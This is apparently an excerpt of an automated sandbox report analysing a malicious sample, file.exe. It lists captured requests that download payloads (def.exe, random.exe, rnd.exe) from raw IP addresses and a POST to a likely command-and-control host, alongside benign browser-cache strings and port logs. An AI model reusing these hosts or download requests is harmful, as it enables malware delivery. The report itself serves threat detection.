              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: file.exe, 00000000.00000003.2013930464.0000000000E53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
              Source: file.exe, 00000000.00000003.2013930464.0000000000E53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/D
              Source: file.exe, 00000000.00000003.2013930464.0000000000E53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/O
              Source: file.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exesO?yI
              Source: file.exe, file.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rnd.exe
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_107.6.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_107.6.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_107.6.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_107.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_107.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_107.6.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chromecache_107.6.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: file.exe, file.exe, 00000000.00000003.2013977657.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: file.exe, 00000000.00000003.2013977657.0000000000E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/-int;
              Source: file.exe, 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/7
              Source: file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/::
              Source: file.exe, file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1841073771.0000000000E52000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1881594481.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1840994528.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1881280065.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/r:UI1
              Source: chromecache_89.6.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.1768273755.000000000522E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: file.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1792677260.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768451222.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768273755.000000000522C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792498154.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792840722.0000000005225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: file.exe, 00000000.00000003.1768451222.0000000005200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: file.exe, 00000000.00000003.1792677260.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768451222.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768273755.000000000522C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792498154.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792840722.0000000005225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: file.exe, 00000000.00000003.1768451222.0000000005200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_89.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_99.6.dr, chromecache_89.6.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: file.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: file.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
